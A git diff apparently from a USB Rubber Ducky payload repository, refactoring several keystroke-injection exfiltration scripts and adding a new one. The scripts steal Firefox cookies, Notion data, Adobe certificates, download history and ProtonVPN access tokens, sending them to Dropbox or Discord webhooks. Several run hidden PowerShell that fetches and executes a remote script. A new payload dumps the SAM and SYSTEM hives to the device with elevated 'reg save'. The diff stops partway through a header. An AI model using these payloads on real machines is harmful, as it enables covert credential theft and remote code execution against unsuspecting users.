Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
DELAY 2000
|
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 250
|
DELAY 250
|
||||||
DELETE
|
DELETE
|
||||||
STRING powershell -w h -ep bypass irm
|
STRINGLN powershell -w h -ep bypass irm #PAYLOAD | iex
|
||||||
STRING PAYLOAD
|
|
||||||
STRING | iex
|
|
||||||
ENTER
|
|
||||||
|
|
|
@ -33,18 +33,12 @@ Open a PowerShell, the get dinamically the Notion full-path and then add the `no
|
||||||
</a>
|
</a>
|
||||||
<br>Github
|
<br>Github
|
||||||
</td>
|
</td>
|
||||||
<td align="center" width="96">
|
|
||||||
<a href="https://www.instagram.com/alessandro_greco_aka_aleff/">
|
|
||||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/instagram.png?raw=true width="48" height="48" />
|
|
||||||
</a>
|
|
||||||
<br>Instagram
|
|
||||||
</td>
|
|
||||||
<td align="center" width="96">
|
<td align="center" width="96">
|
||||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||||
</a>
|
</a>
|
||||||
<br>Discord
|
<br>Linkedin
|
||||||
</td>
|
</td>
|
||||||
</tr>
|
</tr>
|
||||||
</table>
|
</table>
|
||||||
</div>
|
</div>
|
|
@ -1,26 +1,68 @@
|
||||||
REM #########################################################################
|
REM_BLOCK
|
||||||
REM # |
|
#########################################################################
|
||||||
REM # Title : Exfiltrates the entire database of the Notion client |
|
# #
|
||||||
REM # Author : Aleff |
|
# Title : Exfiltrates the entire database of the Notion client #
|
||||||
REM # Version : 1.0 |
|
# Author : Aleff #
|
||||||
REM # Category : Exfiltration |
|
# Version : 1.0 #
|
||||||
REM # Target : Windows 10-11 |
|
# Category : Exfiltration #
|
||||||
REM # |
|
# Target : Windows 10-11 #
|
||||||
REM #########################################################################
|
# #
|
||||||
|
#########################################################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Requirements:
|
REM Requirements:
|
||||||
REM - Notion must be installed
|
REM - Notion must be installed
|
||||||
REM - Internet Connection
|
REM - Internet Connection
|
||||||
|
|
||||||
|
|
||||||
REM You must define your Dropbox accessToken or modify the exfiltration modality.
|
REM You must define your Dropbox accessToken or modify the exfiltration modality.
|
||||||
DEFINE #DROPBOX_ACCESS_TOKEN example
|
DEFINE #DROPBOX_ACCESS_TOKEN example
|
||||||
|
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
STRING PowerShell
|
STRINGLN PowerShell
|
||||||
ENTER
|
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
|
|
||||||
REM Settings about Notion DB
|
REM Settings about Notion DB
|
||||||
|
|
|
@ -1,31 +1,69 @@
|
||||||
REM ####################################################
|
REM_BLOCK
|
||||||
REM # |
|
####################################################
|
||||||
REM # Title : Export Firefox Cookies Database |
|
# #
|
||||||
REM # Author : Aleff |
|
# Title : Export Firefox Cookies Database #
|
||||||
REM # Version : 1.0 |
|
# Author : Aleff #
|
||||||
REM # Category : Exfiltration |
|
# Version : 1.0 #
|
||||||
REM # Target : Windows 10-11 |
|
# Category : Exfiltration #
|
||||||
REM # |
|
# Target : Windows 10-11 #
|
||||||
REM ####################################################
|
# #
|
||||||
|
####################################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Requirements:
|
REM Requirements:
|
||||||
REM - Firefox must be installed
|
REM - Firefox must be installed
|
||||||
|
|
||||||
|
|
||||||
REM You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token.
|
REM You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token.
|
||||||
DEFINE DROPBOX_ACCESS_TOKEN "example"
|
DEFINE #DROPBOX_ACCESS_TOKEN "example"
|
||||||
|
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
DELAY 1000
|
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING powershell
|
STRINGLN powershell
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
|
|
||||||
|
|
||||||
REM Get cookies DB path
|
REM Get cookies DB path
|
||||||
STRINGLN
|
STRINGLN
|
||||||
$firefoxProfilePath = Join-Path -Path $env:APPDATA -ChildPath 'Mozilla\Firefox\Profiles'
|
$firefoxProfilePath = Join-Path -Path $env:APPDATA -ChildPath 'Mozilla\Firefox\Profiles'
|
||||||
|
@ -33,14 +71,8 @@ STRINGLN
|
||||||
|
|
||||||
$filePath = Join-Path -Path $firefoxProfile.FullName -ChildPath 'cookies.sqlite'
|
$filePath = Join-Path -Path $firefoxProfile.FullName -ChildPath 'cookies.sqlite'
|
||||||
|
|
||||||
END_STRINGLN
|
$accessToken = #DROPBOX_ACCESS_TOKEN
|
||||||
|
|
||||||
REM Setting about exfiltration
|
|
||||||
STRING $accessToken =
|
|
||||||
STRING DROPBOX_ACCESS_TOKEN
|
|
||||||
ENTER
|
|
||||||
|
|
||||||
STRINGLN
|
|
||||||
$uploadUrl = "https://content.dropboxapi.com/2/files/upload"
|
$uploadUrl = "https://content.dropboxapi.com/2/files/upload"
|
||||||
|
|
||||||
$dropboxFilePath = "/cookies_exported.sqlite"
|
$dropboxFilePath = "/cookies_exported.sqlite"
|
||||||
|
|
|
@ -1,26 +1,68 @@
|
||||||
REM ####################################################################
|
REM_BLOCK
|
||||||
REM # |
|
####################################################################
|
||||||
REM # Title : Export all saved certificates with Adobe Reader |
|
# #
|
||||||
REM # Author : Aleff |
|
# Title : Export all saved certificates with Adobe Reader #
|
||||||
REM # Version : 1.0 |
|
# Author : Aleff #
|
||||||
REM # Category : Exfiltration |
|
# Version : 1.0 #
|
||||||
REM # Target : Windows 10-11 |
|
# Category : Exfiltration #
|
||||||
REM # |
|
# Target : Windows 10-11 #
|
||||||
REM ####################################################################
|
# #
|
||||||
|
####################################################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Requirements:
|
REM Requirements:
|
||||||
REM - Adobe Reader must be installed
|
REM - Adobe Reader must be installed
|
||||||
REM - Internet Connection
|
REM - Internet Connection
|
||||||
|
|
||||||
|
|
||||||
REM You must define your Dropbox accessToken or modify the exfiltration modality.
|
REM You must define your Dropbox accessToken or modify the exfiltration modality.
|
||||||
DEFINE #DROPBOX_ACCESS_TOKEN example
|
DEFINE #DROPBOX_ACCESS_TOKEN example
|
||||||
|
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
STRING PowerShell
|
STRINGLN PowerShell
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
|
|
||||||
REM Settings about Adobe Reader
|
REM Settings about Adobe Reader
|
||||||
|
|
|
@ -1,20 +1,63 @@
|
||||||
REM ###########################################################
|
REM_BLOCK
|
||||||
REM # |
|
###########################################################
|
||||||
REM # Title : Exports all the links of the downloads |
|
# #
|
||||||
REM # Author : Aleff |
|
# Title : Exports all the links of the downloads #
|
||||||
REM # Version : 1.0 |
|
# Author : Aleff #
|
||||||
REM # Category : Exfiltration |
|
# Version : 1.0 #
|
||||||
REM # Target : Windows 10/11 |
|
# Category : Exfiltration #
|
||||||
REM # |
|
# Target : Windows 10/11 #
|
||||||
REM ###########################################################
|
# #
|
||||||
|
###########################################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Requirements:
|
REM Requirements:
|
||||||
REM - Firefox installed
|
REM - Firefox installed
|
||||||
|
|
||||||
|
|
||||||
REM You must define your Discord webhook if you want to use this method for the exfiltration
|
REM You must define your Discord webhook if you want to use this method for the exfiltration
|
||||||
DEFINE DISCORD_WEBHOOK example
|
DEFINE #DISCORD_WEBHOOK example
|
||||||
|
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
REM Open Firefox
|
REM Open Firefox
|
||||||
GUI
|
GUI
|
||||||
|
@ -49,9 +92,7 @@ DELAY 10000
|
||||||
STRINGLN "
|
STRINGLN "
|
||||||
|
|
||||||
REM Exfiltration using Discord Webhook
|
REM Exfiltration using Discord Webhook
|
||||||
STRING $WebhookUrl = "
|
STRINGLN $WebhookUrl = "#DISCORD_WEBHOOK"
|
||||||
STRING DISCORD_WEBHOOK
|
|
||||||
STRINGLN "
|
|
||||||
|
|
||||||
STRINGLN $Payload = @{content = $DOWNLOADS} | ConvertTo-Json
|
STRINGLN $Payload = @{content = $DOWNLOADS} | ConvertTo-Json
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,29 @@
|
||||||
|
# Exfiltrate NTLM Hash - Windows ✅
|
||||||
|
|
||||||
|
A Rubber Ducky payload to exfiltrate NTLM hash files from a Windows machine onto the SD card.
|
||||||
|
|
||||||
|
## Description
|
||||||
|
|
||||||
|
This payload script captures and <strong>exfiltrates NTLM hash files</strong> from a Windows machine. It uses PowerShell commands to locate and save the SAM and SYSTEM files, which contain hashed user passwords, <strong><u>onto the Rubber Ducky's SD card</u></strong> for later extraction and analysis. Upon successful file extraction, <strong> the payload triggers a visual confirmation by <u>blinking the Caps Lock LED</u> </strong>
|
||||||
|
|
||||||
|
|
||||||
|
### Settings
|
||||||
|
|
||||||
|
- **Drive Label:** Set the target drive label for Rubber Ducky storage (default: `DUCKY`).
|
||||||
|
- **Blink Count:** Adjust the number of Caps Lock LED blinks by setting the `#numBlinks` variable (default is 9 blinks).
|
||||||
|
|
||||||
|
## Credits
|
||||||
|
|
||||||
|
<h2 align="center"> Luu176 </h2>
|
||||||
|
<div align="center">
|
||||||
|
<table>
|
||||||
|
<tr>
|
||||||
|
<td align="center" width="96">
|
||||||
|
<a href="https://github.com/luu176">
|
||||||
|
<img src="https://avatars.githubusercontent.com/u/112649910?v=4" width="48" height="48" />
|
||||||
|
</a>
|
||||||
|
<br>GitHub
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</div>
|
|
@ -0,0 +1,81 @@
|
||||||
|
REM_BLOCK
|
||||||
|
TITLE Exfiltrate NTLM Hash Files onto Ducky Storage
|
||||||
|
AUTHOR Luu176
|
||||||
|
DESCRIPTION This payload exfiltrates NTLM hash files (which contain hashed passwords for users
|
||||||
|
on the current Windows device) to the Rubber Ducky's SD card for further analysis.
|
||||||
|
It utilizes PowerShell commands to locate and save NTLM files (SAM and SYSTEM) to
|
||||||
|
the defined storage drive on the Ducky device.
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
DEFINE #driveLabel DUCKY
|
||||||
|
REM below you can set the number of blinks for the caps lock when finished (default 9)
|
||||||
|
DEFINE #numBlinks 9
|
||||||
|
|
||||||
|
ATTACKMODE HID STORAGE
|
||||||
|
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
|
SAVE_HOST_KEYBOARD_LOCK_STATE
|
||||||
|
IF ($_CAPSLOCK_ON == TRUE)
|
||||||
|
CAPSLOCK
|
||||||
|
END_IF
|
||||||
|
GUI d
|
||||||
|
DELAY 1000
|
||||||
|
GUI r
|
||||||
|
DELAY 500
|
||||||
|
STRINGLN powershell Start-Process powershell -Verb runAs
|
||||||
|
DELAY 800
|
||||||
|
ALT y
|
||||||
|
DELAY 800
|
||||||
|
STRINGLN cd (gwmi win32_volume -f 'label=''#driveLabel''').Name;reg save hklm\sam SAM;reg save hklm\system SYS;(New-Object -ComObject wscript.shell).SendKeys('{CAPSLOCK}');exit
|
||||||
|
GUI d
|
||||||
|
WAIT_FOR_CAPS_ON
|
||||||
|
REM once finished downloading SAM and SYSTEM, caps lock LED turn on and then flash (note: may take a couple minutes max to download)
|
||||||
|
VAR $i = 0
|
||||||
|
WHILE ( $i < #numBlinks )
|
||||||
|
DELAY 150
|
||||||
|
CAPSLOCK
|
||||||
|
$i = ( $i + 1 )
|
||||||
|
END_WHILE
|
||||||
|
RESTORE_HOST_KEYBOARD_LOCK_STATE
|
|
@ -1,43 +1,83 @@
|
||||||
REM ###################################################################
|
REM_BLOCK
|
||||||
REM # |
|
###################################################################
|
||||||
REM # Title : ProtonVPN-config-to-Discord-Exfiltration |
|
# #
|
||||||
REM # Author : Aleff |
|
# Title : ProtonVPN-config-to-Discord-Exfiltration #
|
||||||
REM # Version : 1.0 |
|
# Author : Aleff #
|
||||||
REM # Category : Credentials, Exfiltration |
|
# Version : 1.0 #
|
||||||
REM # Target : Windows 10-11 |
|
# Category : Credentials, Exfiltration #
|
||||||
REM # |
|
# Target : Windows 10-11 #
|
||||||
REM ###################################################################
|
# #
|
||||||
|
###################################################################
|
||||||
|
|
||||||
REM Title: ProtonVPN-config-to-Discord-Exfiltration
|
Title: ProtonVPN-config-to-Discord-Exfiltration
|
||||||
REM Author: Aleff
|
Author: Aleff
|
||||||
REM Description: Opens PowerShell hidden, grabs ProtonVPN config file, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
|
Description: Opens PowerShell hidden, grabs ProtonVPN config file, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
|
||||||
REM In the config file you can find a lot information about the user like:
|
In the config file you can find a lot information about the user like:
|
||||||
REM - UserUid
|
- UserUid
|
||||||
REM - UserAccessToken
|
- UserAccessToken
|
||||||
REM - UserRefreshToken
|
- UserRefreshToken
|
||||||
REM - UserAuthenticationPublicKey
|
- UserAuthenticationPublicKey
|
||||||
REM - UserAuthenticationSecretKey
|
- UserAuthenticationSecretKey
|
||||||
REM - UserAuthenticationCertificatePem
|
- UserAuthenticationCertificatePem
|
||||||
REM - UserCertificationServerPublicKey
|
- UserCertificationServerPublicKey
|
||||||
REM - and so on...
|
- and so on...
|
||||||
REM Then it cleans up traces of what you have done after.
|
Then it cleans up traces of what you have done after.
|
||||||
REM Target: Windows 10-11 (PowerShell + ProtonVPN software)
|
Target: Windows 10-11 (PowerShell + ProtonVPN software)
|
||||||
REM Version: 1.0
|
Version: 1.0
|
||||||
REM Category: Credentials, Exfiltration
|
Category: Credentials, Exfiltration
|
||||||
REM Requirements: ProtonVPN user logged at least one time and internet connection
|
Requirements: ProtonVPN user logged at least one time and internet connection
|
||||||
REM
|
END_REM
|
||||||
|
|
||||||
|
REM Reply example.com with YOUR LINK. The Payload should be ProtonVPN-config.ps1
|
||||||
|
DEFINE #PAYLOAD example.com
|
||||||
|
|
||||||
REM REQUIRED - Provide your url WEBHOOK - https://discordapp.com/api/webhooks/<webhook_id>/<token>
|
REM REQUIRED - Provide your url WEBHOOK - https://discordapp.com/api/webhooks/<webhook_id>/<token>
|
||||||
DEFINE WEBHOOK example.com
|
DEFINE #WEBHOOK example.com
|
||||||
|
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
DELAY 2000
|
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 250
|
DELAY 250
|
||||||
DELETE
|
DELETE
|
||||||
STRING powershell -w h -ep bypass $discord='
|
STRINGLN powershell -w h -ep bypass $discord='#WEBHOOK';irm #PAYLOAD | iex
|
||||||
STRING WEBHOOK
|
|
||||||
|
|
||||||
REM Reply example.com with YOUR LINK. The Payload should be ProtonVPN-config.ps1
|
|
||||||
DEFINE PAYLOAD example.com
|
|
||||||
STRING ';irm PAYLOAD | iex
|
|
||||||
ENTER
|
|
||||||
|
|
|
@ -41,18 +41,12 @@ I used the [DETECT_READY](https://shop.hak5.org/blogs/usb-rubber-ducky/detect-re
|
||||||
</a>
|
</a>
|
||||||
<br>Github
|
<br>Github
|
||||||
</td>
|
</td>
|
||||||
<td align="center" width="96">
|
|
||||||
<a href="https://www.instagram.com/alessandro_greco_aka_aleff/">
|
|
||||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/instagram.png?raw=true width="48" height="48" />
|
|
||||||
</a>
|
|
||||||
<br>Instagram
|
|
||||||
</td>
|
|
||||||
<td align="center" width="96">
|
<td align="center" width="96">
|
||||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||||
</a>
|
</a>
|
||||||
<br>Discord
|
<br>Linkedin
|
||||||
</td>
|
</td>
|
||||||
</tr>
|
</tr>
|
||||||
</table>
|
</table>
|
||||||
</div>
|
</div>
|
|
@ -1,12 +1,14 @@
|
||||||
REM ###########################################################
|
REM_BLOCK
|
||||||
REM # |
|
###########################################################
|
||||||
REM # Title : Tree Structure Of The Operating System |
|
# #
|
||||||
REM # Author : Aleff |
|
# Title : Tree Structure Of The Operating System #
|
||||||
REM # Version : 1.0 |
|
# Author : Aleff #
|
||||||
REM # Category : Exfiltration |
|
# Version : 1.0 #
|
||||||
REM # Target : Windows 10-11 |
|
# Category : Exfiltration #
|
||||||
REM # |
|
